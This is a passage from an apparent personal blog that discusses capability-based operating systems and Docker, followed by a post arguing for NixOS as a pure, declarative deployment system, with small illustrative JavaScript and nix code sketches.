While Qubes relies on the user organising their actions into explicit categories (“work”, “games”, etc), Genode is instead a capability-based model. The basic idea here is that instead of having ambient authority like a regular OS (things like a hierarchical file system, network stack or inter-process-communication) which any running process can access using well-known methods, a process in a capability-based system can access only the resources that are explicitly passed to it. It’s kind of like in programming, where instead of passing a file path around and allowing anyone to access any file they wish, you might pass a very restrictive File object instead. Except that in this analogy, it would be impossible to access the filesystem outside of individual references passed to you, making it very explicit which files a procedure can access. Doing this for anything involving authority allows you to keep processes isolated on a very granular level, by only providing them capabilities to the services / powers they actually need, rather than trying to design system-wide security policies like current OSes do.
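The programming analogy can be sketched in a few lines of JavaScript. This has nothing to do with Genode's actual interfaces: the filesystem object, readCapability and both word-count functions are made up for illustration. And unlike a real capability system, nothing in JavaScript stops wordCount from reaching the global filesystem variable, so this only shows the shape of the idea.

```javascript
// A pretend filesystem, standing in for ambient authority.
var filesystem = {
  '/home/me/notes.txt': 'hello world',
  '/home/me/secrets.txt': 'hunter2',
};

// Ambient style: the function gets a path, and could just as easily
// look up any other path it likes.
function wordCountAmbient(path) {
  return filesystem[path].split(/\s+/).length;
}

// Capability style: the caller hands over an object which grants
// read access to exactly one file, and nothing else.
function readCapability(path) {
  return Object.freeze({
    read: function() { return filesystem[path]; },
  });
}

function wordCount(file) {
  // all this function can do is read the one file it was given
  return file.read().split(/\s+/).length;
}

console.log(wordCount(readCapability('/home/me/notes.txt')));
```

The caller decides which file is visible at the point where the capability is created, rather than relying on a system-wide policy about what wordCount should be allowed to open.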

I’ve been following this for a while, but it’s a fairly low-level project compared to where I usually spend my time, so it’s hard for me to do much with. I don’t have much love for C++ (in which the entire OS is built), and releases are still featuring low level things like improved USB & networking stacks, filesystem drivers, etc. So while I’m very interested to see where the OS goes, it’s only from the sidelines, as I can’t really do much with it myself.

Honourable mention: Sandstorm.io

I’ve never been terribly fond of the notion that everything should be a web app, any more than the notion that all code should be javascript. But web apps have proven extremely useful in their variety, stability and portability. So much so that some native applications end up being delivered as a web server + chromeless webkit component.

Sandstorm normalizes this approach, and provides a way for users to easily run their own web services under their own control, completely sandboxed from each other and the rest of the user’s computer. It’s an interesting direction, and provides a path for users to take control of some hosted services (e.g for things like self-hosted RSS apps). But anything that’s not single-user is going to have to be heavily federated in order to work with sandstorm’s model, and I don’t think that’s terribly likely (especially if you’re dealing with federated “servers” that disappear when a user suspends their computer).

Interestingly, the core model of sandstorm (running isolated web services) is also something that I think could be completely superseded by genode, if it were to take off as a general-purpose OS. Presumably that’s a long-to-infinite time away, though.

And hey, they’re talking about capability-based security for web applications, and that would definitely be an interesting development if it took off.

Less-honourable mention: Docker

I want to love docker, I really do. I was very excited when it was first announced. I’ve long been a fan of the underlying LXC technologies it uses for isolation. But it’s pretty clear now that its features are aimed just a little too far away from what I would actually want.

I do use it. But never in the way that docker seems to want me to, which is a little awkward. The main push of docker seems to be for completely self-contained applications, basically a super cheap and consistent VM. But VMs are a hack, and docker in many ways is just as hacky. Why would I want an operating system (e.g RHEL) on my host, and a different operating system (perhaps Ubuntu) inside the docker container? I can’t run systemd inside docker¹, so all of the Nice Things that you get with systemd need to be replaced with fairly weak alternatives (like supervisord). And unlike nix, docker’s caching is optimistic (a.k.a “wrong”). You’ll rarely ever get the same actual result with the same build inputs, because docker containers rely on doing very time-relevant things like installing or updating to the “latest version” of some package. And making sure important security updates are applied to a docker container is often even harder than it is for a VM.

And then because you need a lot of containers, suddenly you need cluster management on top of your docker containers. I’ve looked at a few of these, and they’re not really appealing to me. It’s kind of like running OpenStack - a pretty huge amount of additional effort, resources and (not entirely bug-free) code which in most small deployments will just cause you more hassle than they solve.

Interestingly, nixos has some container functionality. But because it’s built on nixos itself, almost all of what docker provides is completely unnecessary - specifying a container is just like specifying the OS, because that’s already completely stateless and declarative. You don’t need a way to build a root filesystem, because nixos already does that. You don’t need a way to cache the results of a build and overlay them, because nixos already does that (but without needing the overlay part). And you don’t need special tricks to apply security updates - the host and container are running the same OS; rebuilding the host also rebuilds the container (but without any actual duplication, thanks to nix’s pervasive caching).

So while I’ll still use docker for development (e.g a cheap way to test software on an Ubuntu-like environment), I’m no longer excited about where Docker is going.

Update (06/01/2015): It’s been pointed out in the comments that you can run systemd inside docker. I tried and failed in the past, but I think things have gotten better since. ↩

NixOS and Stateless Deployment

2015-01-03T00:00:00+11:00

If I had my way, I would never deploy or administer a linux server that isn’t running NixOS.

I’m not exactly a prolific sysadmin - in my time, I’ve set up and administered servers numbering in the low tens. And yet every single time, it’s awful.

Firstly, you give up on the notion of doing anything manually, ever. Anytime you do something manually you create a unique snowflake, and then 3 weeks (or 3 years!) down the track you tear your hair out trying to recreate whatever seemingly-unimportant thing it is you did last time that must have made it work.

So you learn about automated deployment. There is no shortage of tools, and they’re mostly pretty similar. I’ve personally used these, and learned about many more in my quest not to have an awful deployment experience:

All of these work more or less as advertised, but all of them still leave me with a pretty crappy deployment experience.

The problem

Most of those are imperative, in that they boil down to a list of steps - “install X”, “upload file A -> B”, etc. This is the obvious approach to automating deployment, kind of like a shell script is the obvious approach to automating a process. It takes what you currently do, and turns it into one or more concrete files that you can modify and replay later.

And obviously, the entire problem of server deployment is deeply stateful - your server is quite literally a state machine, and each deployment attempts to modify its current state into (hopefully) the expected target state.

Unfortunately, in such a system it can be difficult to predict how the current state will interact with your deployment scripts. Performing the same deployment to two servers that started in different states can have drastically different results. Usually one of them failing.

Puppet is a little different, in that you don’t specify what you want to happen, but rather the desired state. Instead of writing down the steps required to install the package foo, you simply state that you want foo to be installed, and puppet knows what to do to get the current system (whatever its state) into the state you asked for.

Which would be great, if it weren’t a pretty big lie.

The thing is, it’s a fool’s errand to try and specify your system state in puppet. Puppet is built on traditional linux (and even windows) systems, with their stateful package managers and their stateful file systems and their stateful user management and their stateful configuration directories, and… well, you get the idea. There are plenty of places for state to hide, and puppet barely scratches the surface.

If you deploy a puppet configuration that specifies “package foo must be installed”, but then you remove that line from your config at time t, what happens? Well, now any servers deployed before t will have foo installed, but new servers (after t) will not. You did nothing wrong, it’s just that puppet’s declarative approach is only a thin veneer over an inherently stateful system.

To correctly use puppet, you would have to specify not only what you do want to be true about a system, but also all of the possible things that you do not want to be true about a system. This includes any package that may have ever been installed, any file that may have ever been created, any users or groups that may have ever been created, etc. And if you miss any of that, well, don’t worry. You’ll find out when it breaks something.
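The "removed line" problem is easy to reproduce in a toy model. The following sketch is not how puppet is implemented; it just treats a server as a set of installed packages and compares a non-exhaustive apply (only touch what the config mentions) with an exhaustive one (the result depends on the config alone). All names here are hypothetical.

```javascript
// Non-exhaustive: make sure everything in the config is present,
// and leave whatever else is on the machine alone.
function applyNonExhaustive(currentPackages, config) {
  var next = new Set(currentPackages);
  config.installed.forEach(function(pkg) { next.add(pkg); });
  return next;
}

// Exhaustive: the previous state is ignored entirely.
function applyExhaustive(_currentPackages, config) {
  return new Set(config.installed);
}

var before = { installed: ['nginx', 'foo'] }; // config before time t
var after = { installed: ['nginx'] };         // "foo" line removed at time t

// A server deployed before t and then updated, versus a fresh one.
var oldServer = applyNonExhaustive(applyNonExhaustive(new Set(), before), after);
var newServer = applyNonExhaustive(new Set(), after);
console.log(oldServer.has('foo'), newServer.has('foo')); // true false

var oldExhaustive = applyExhaustive(applyExhaustive(new Set(), before), after);
console.log(oldExhaustive.has('foo')); // false
```

With the non-exhaustive apply, two servers with the same config end up different depending on their history. With the exhaustive one, history cannot matter, because it is never consulted.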

So servers are deeply stateful. And deployment is typically imperative. This is clearly a bad mix for something that you want to be as reproducible and reliable as possible.

Puppet tries to fix the “imperative” part of deployment, but can’t really do anything about the statefulness of its hosts. Can we do better?

Well, yeah.

`nix`, the purely functional package manager

It started with nix, the “purely functional package manager”. From the description, you can tell that nix is not your standard package manager. Most packaging systems consist of thousands of individual packages, referenced by some package id / name, with loose versioning requirements on other packages in the repository (e.g “libfoo >= 2.3.1 <2.4”). This has worked well for OSS distributions for a long time, and it’s a pretty versatile model. But nix is different. It is not a collection of packages, each with multiple versions. It is a single, monolithic expression defined in a functional, lazy, purpose-built language.

So you don’t have a package named git. You have “the entire set of packages” (usually named pkgs), and you can access its git property, which is a specific version of git. For git, there is only one version. For other tools (like python), there are multiple different attributes for different minor versions (e.g. pkgs.python is an alias to pkgs.python2, which itself is an alias to pkgs.python27).

Okay, but why?

So far, this is not functionally different to standard package management. After all, my fedora box has explicit python2 and python2.7 packages too. But one difference is that traditional packages are global, and not user-serviceable. Say that (for whatever reason), you needed python2.7 with some additional patch. Since the entire package space exists in one expression, you can manipulate it in very flexible ways. For example:

# my-python.nix
{ pkgs }:
let base = pkgs.python27;
in base.overrideAttrs (old: {
	# keep whatever patches the official package applies, then add ours
	patches = (old.patches or []) ++ [ ./my-python.patch ];
})

Even if you’ve never read a nix expression before, you can probably guess what that does. It defines a function which takes an argument named pkgs. It binds the local variable base to pkgs.python27. And it defines the result to be base with a single overridden patches attribute. overrideAttrs takes a function from the old attributes to the ones you want to change, and re-evaluates the package with them (simply merging attribute sets with the // operator would change the patches attribute without changing what actually gets built). This just takes whatever patches the base expression has (if any), and adds the my-python.patch file. patches is a standard attribute - a list of patch files which will be applied to the source before building. So now we have a python package which is identical to the official package with just a tiny modification. We didn’t have to set up our own repository, or figure out how to make a modified .rpm from our distro’s sources.

Thankfully, I’ve never needed to run a patched version of python on a production server. But I have needed to experiment with prerelease versions of etcd on a test server, and nix makes substituting official packages for modified versions pretty trivial.

The right dependency for the job

Another interesting outcome of the packages being defined in a proper programming language is that package sets can be parameterised. Often, python libraries are version-independent - the same code will work just fine in multiple minor versions of python (e.g 2.6, 2.7), sometimes even major versions (2.x and 3.x). But any module that requires compilation must be compiled against the minor version of python that it’ll be used with. And python is pretty good at its ABI guarantees - other runtimes (like ocaml or haskell) have extremely delicate ABIs which generally mean you must compile against the exact runtime and libraries that you’ll be using at runtime.

For nix, this happens automatically. Each python package is actually a function which takes (amongst other things) the python implementation in use. This could be pkgs.python, pkgs.python27 or even my-python (that we made above). Because each python package has a build-time dependency on the exact python version used, you will never have ABI or other incompatibilities that come from using a different version at build time than run time.
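If the idea of "a package is a function of its interpreter" sounds abstract, here is roughly the same shape in JavaScript. This is only an analogy and not how nixpkgs is laid out; numpy, packagesFor and the id fields are hypothetical.

```javascript
// Each "package" is a function of the interpreter it gets built against.
function numpy(python) {
  return { name: 'numpy', builtAgainst: python.id };
}

// A whole package set, parameterised by the python implementation in use.
function packagesFor(python) {
  return {
    python: python,
    numpy: numpy(python),
  };
}

var python27 = { id: 'python-2.7' };
var myPython = { id: 'python-2.7-patched' };

console.log(packagesFor(python27).numpy.builtAgainst);
console.log(packagesFor(myPython).numpy.builtAgainst);
```

There is no global "the python" for numpy to accidentally pick up. Whichever implementation was passed in is the one it is built against, and the one it is paired with in the resulting set.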

And to make sure that the python version used at compile time is also used at runtime, nix doesn’t use the concept of a globally-installed python interpreter. When you pass a python implementation to a nix function, that function will actually see python as living at a path like /nix/store/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx-python/bin/python (and will hard-code this path wherever needed, instead of e.g. /usr/bin/python). The xxxxxxxxs are a cryptographic hash of the inputs used to define this python implementation. Since nix is pure¹, the same inputs will produce the same output. This means the above path is immutable, which is good for both caching and consistency. And because each nix build output lives in a unique path under /nix/store, you never run into name clashes - you can have as many simultaneous versions of python (or anything else) as your system needs, although you’ll generally end up with just one or two in practice.
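Here is a toy illustration of input-addressed paths. It is emphatically not nix's real hashing scheme: toyHash is a small non-cryptographic hash (32-bit FNV-1a) standing in for the cryptographic one, and storePath and the shape of the inputs object are assumptions made up for this sketch.

```javascript
// Toy 32-bit FNV-1a hash, a stand-in for the cryptographic hash nix uses.
function toyHash(str) {
  var h = 0x811c9dc5;
  for (var i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return ('0000000' + h.toString(16)).slice(-8);
}

// Hypothetical: derive an output path from a name, plus everything
// that went into the build.
function storePath(name, inputs) {
  // sort the keys, so that property order does not affect the result
  var canonical = Object.keys(inputs).sort().map(function(key) {
    return key + '=' + inputs[key];
  }).join(';');
  return '/nix/store/' + toyHash(name + ';' + canonical) + '-' + name;
}

var official = storePath('python', { version: '2.7', patches: '' });
var sameAgain = storePath('python', { patches: '', version: '2.7' });
var patched = storePath('python', { version: '2.7', patches: 'my-python.patch' });

console.log(official === sameAgain); // same inputs, same path
console.log(official === patched);   // different inputs, different path
```

Since the path is a function of the inputs, two builds can only collide on a path if they were asked to build the same thing, and a changed input can never silently overwrite an existing output.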

Hardcode all the things

This definitely has some inefficiencies. For one, overriding the “default” python to the one we defined above will cause every python package that you use with it to be rebuilt, because the inputs used to build python are slightly different from the officially-built packages. On the other hand, there is no way for nix to tell whether a given change affects the ABI (or API) of an implementation. The only safe thing that nix can do is to rebuild in this case, which means nix will rebuild things when it doesn’t necessarily need to, but on the other hand it never has to worry about ABI incompatibilities. Distributions are more efficient here by only rebuilding when necessary, but at the cost of a fair bit of manpower, runtime-specific knowledge, and sometimes getting it wrong.

Because a nix implementation hardcodes paths to all its dependencies as paths under /nix/store, it’s actually incredibly easy to compute the closure of a given implementation - that is, every other implementation that it references, transitively. This means that if you build something locally, you can run nix-copy-closure <path> <remote-machine> to have that exact implementation, and all of its transitive dependencies, copied to a remote machine. This is obviously tremendously useful for deployment, as you can be sure that each machine will receive the exact same results, without having to deal with time-related inconsistencies (like running apt-get update at different times on different machines). It’s also extremely efficient - nix store paths are unique and immutable, so any store path that already exists doesn’t need to be copied (or even re-checked).
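Computing a closure is just a graph traversal. The sketch below uses a made-up reference graph with short names in place of real store paths; closure and pathsToCopy are hypothetical helpers, not part of nix, but they show why the copy step can be so cheap.

```javascript
// Hypothetical reference graph: store path -> store paths it refers to.
var references = {
  'app': ['python', 'openssl'],
  'python': ['glibc', 'openssl'],
  'openssl': ['glibc'],
  'glibc': [],
};

// Every path reachable from root, including root itself.
function closure(root) {
  var seen = new Set();
  var queue = [root];
  while (queue.length > 0) {
    var path = queue.pop();
    if (seen.has(path)) continue;
    seen.add(path);
    (references[path] || []).forEach(function(dep) { queue.push(dep); });
  }
  return seen;
}

// Paths are immutable, so anything the remote already has can be skipped
// without even looking inside it.
function pathsToCopy(root, remoteHas) {
  return Array.from(closure(root)).filter(function(path) {
    return !remoteHas.has(path);
  }).sort();
}

console.log(pathsToCopy('app', new Set(['glibc', 'openssl'])));
```

In this example only app and python need to be sent, since the remote already holds identical copies of everything else in the closure.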

The payoff: NixOS

But I haven’t even got to the most amazing part of nix yet: NixOS. NixOS came from the desire to extend nix’s features from “package management” to “the entire machine”.

With nix, every derivation (output) is pure - given the same set of inputs, you get the same output. And what’s more, the inputs are described in one language (also called nix), which is functional and strongly typed. So if you could define an entire machine using the nix language, and somehow run it, it would be like puppet on steroids - the state of the entire machine would be pure - applying a given config would always produce the same result, regardless of the previous state of the machine. This is exactly what NixOS does, and it works amazingly well.

Why is it better than those other declarative systems?

It should hopefully be obvious at this point why NixOS is better than puppet: Both are declarative, but puppet is impure and non-exhaustive - when you apply a config, puppet compares everything specified against the current state of the system. Everything not specified is left alone, which means you’re only specifying a very tiny subset of your system. With NixOS, if something is not specified, it is not present. This includes configuration files, packages, even users and groups. So NixOS is pure, declarative and exhaustive. In fact, due to nix’s purity and pervasive caching, “rebuilding the entire OS” with NixOS is often quicker than reapplying a relatively simple puppet config.

Puppet is not the only declarative system though - docker is declarative and exhaustive. It’s obviously a bit of an apples to oranges comparison (like comparing Ubuntu to VirtualBox), but the similarities are still interesting:

Building a docker image starts with a well-known state (e.g a vanilla Ubuntu-LTS image), and the steps in a Dockerfile are simply executed sequentially. When you rebuild the Dockerfile it doesn’t try and get you from the current state to the new state, it just throws away the current state and rebuilds the new state from scratch. Of course, it also uses caching so that you don’t have to wait half an hour to rebuild stuff that you haven’t changed. Unfortunately for docker, its caching mechanism is “usually good enough”, a.k.a “sometimes catastrophically broken” if you aren’t aware of its impurities².

So docker is both declarative and exhaustive, but its impurities still cause issues and inconsistencies between builds (as well as a lot of redundant work when rebuilding, which can be very slow). Also, because you’re pretty much running two OSes (guest and host), you need to deal with all of those issues too (in particular, making sure security updates are applied on both systems). And once you have a docker container, you still need to worry about the environment in which you’re running it, which docker doesn’t address at all.
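The caching impurity can be modelled in a few lines. This is a deliberately simplified sketch which assumes the cache is keyed only on the text of each build step; layerCache, buildStep and the libfoo version numbers are all invented for illustration.

```javascript
// Toy model of a layer cache keyed only on the text of each build step.
var layerCache = {};

function buildStep(instruction, execute) {
  if (!(instruction in layerCache)) {
    layerCache[instruction] = execute(); // only runs on a cache miss
  }
  return layerCache[instruction];
}

// The outside world, which changes between builds.
var latestLibfoo = '1.0';
function upgrade() {
  return 'libfoo-' + latestLibfoo;
}

var firstBuild = buildStep('RUN apt-get update && apt-get upgrade', upgrade);
latestLibfoo = '1.1'; // a security fix is released upstream
var secondBuild = buildStep('RUN apt-get update && apt-get upgrade', upgrade);

console.log(firstBuild, secondBuild);
```

Both builds report libfoo-1.0: the instruction text did not change, so the second build never notices that the world did. The cache key is missing an input, which is exactly the kind of thing nix's purity rules out.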

Lumps of impurity

Of course, not everything should be stateless. If you have a database server and you change its configuration, you really do want it to keep some state around (the database!). But NixOS keeps the “OS” parts of the machine stateless, meaning that the only state you need to manage is that which you create yourself. Off the top of my head (not an exhaustive list):

/var, /tmp, /run: stateful, unmanaged
each user’s $HOME directory: stateful, unmanaged (rarely used on a server, though)
Users & Groups: stateless
Installed software: stateless
Installed services (using systemd): stateless
All program configuration (i.e all of /etc): stateless³
Kernel & kernel modules, grub configuration: stateless (but requires a reboot to activate)
Disk mounts: stateless

By “stateless”, I mean that the given item is generated entirely from the pure nix expression of the system, and isn’t affected by any previous state.

NixOS also uses a bunch of impure technology under the hood, e.g when applying a new set of installed services, it still needs to look at the current installed services in order to tell systemd to stop & remove services that are not in the new system config. But this is fully automated, and the typed, single-language nature of using nix as the only configuration mechanism means that this is not a very complex task, and is generally bug-free.
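That "look at the current state" step amounts to a diff between two lists. As a rough sketch (this is not NixOS's actual activation code, and planServiceChanges is a hypothetical name), it looks something like this:

```javascript
// Work out what to stop and what to start, in order to get from the
// services currently running to the ones the new config asks for.
function planServiceChanges(current, desired) {
  return {
    stop: current.filter(function(s) { return desired.indexOf(s) === -1; }),
    start: desired.filter(function(s) { return current.indexOf(s) === -1; }),
  };
}

var plan = planServiceChanges(
  ['sshd', 'nginx', 'etcd'],
  ['sshd', 'nginx', 'postgresql']
);
console.log(plan);
```

The previous state is only used to decide which actions are needed. The end result (the desired list) comes from the new config alone.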

The bootstrapping problem

Bootstrapping a system is always going to be different to updating a system. Many tools deal with only one side of this equation - e.g many deployment tools will allow you to provision a machine from some base image, but you’ll have to use something else (perhaps ansible or puppet) to keep that machine up to date. And in the space between, you probably need to do some custom scripting to install puppet itself, or set up admin users with appropriate SSH keys.

Nix can’t remove the difference between bootstrapping and updating, but it can dramatically reduce it. I won’t go too deeply into this right now (this post is already rather long), but one important thing about NixOS is that you can build a machine’s configuration locally, and then just push it to the actual machine using nix-copy-closure. Once pushed, a new root can be made active with a single nix command.

When bootstrapping, obviously you don’t yet have a remote machine running NixOS to push to. But that doesn’t mean you have to use completely different tools. Under the hood, the root filesystem of a NixOS machine lives as an attribute of your system config: <config>.system.build.toplevel. But there are other options - if you instead build <config>.system.build.virtualBoxImage, out will pop a VirtualBox image for that system instead. Similar attributes exist for producing an EC2 image, an LXC container, an OpenStack Nova image, and plenty more. So instead of starting from some vanilla NixOS image and then deploying your system over the top (which can be difficult since things like SSH keys and additional users won’t be set up), you can use nix to build a fully-formed image and deploy that directly.

Unfortunately, the stuff I just described is not (yet) very accessible to new users. Right now, it’s probably better to follow the manual install instructions (which are a bit tedious) when you’re just starting out, as it is much simpler to understand what’s going on.

… so should I use it?

NixOS is not yet for the faint of heart. It’s probably very different from what you’re currently using, and you can’t step into it gradually (it’s NixOS or null). Debugging system config can occasionally be tricky, since you can’t just go in and modify a file directly - most of the OS is mounted read-only, forcing you to make modifications properly (i.e. via nix config). This is clearly what you want for deployed machines, but can be frustrating during development.

There’s also the question of security updates. There are (I believe) enough NixOS machines running in production that the nixpkgs folks are pretty keen to apply security updates ASAP, but they will probably never be as responsive as the bigger distros. And there is of course much less manpower available to test the stability of updates. But these are both network effects, which will hopefully improve the more people use it.

So if you’re game, do give it a try. Once you’ve got the hang of it, I doubt you’ll ever want to go back to deploying a “normal” linux distribution. I certainly don’t.

And if you can’t yet commit to NixOS, maybe give nix itself a try. You can install it on Linux and OSX, and it won’t interfere with any system software. It can be quite a useful tool for managing consistent development environments, and is a good way to ease into how nix works without jumping straight into NixOS.

Technically, nix is not completely pure. But there are very few sources of impurity, none of which should be a problem for the standard set of packages in nixpkgs. If your own build process is sensitive to the current temperature, you probably have bigger issues than build impurity. ↩
A problematic example: running apt-get update && apt-get upgrade will apply security fixes the first time it is built, but docker will use that cached result in the future (even if it’s months old). This makes it hard to be sure that a docker image actually includes the latest security updates. ↩
There is a minor edge case where files in /etc that require special permissions (like 600 for /etc/sudoers.d/) may remain after being removed from the configuration. As long as you don’t need to make your own files in /etc with particular permissions, this won’t affect you. ↩
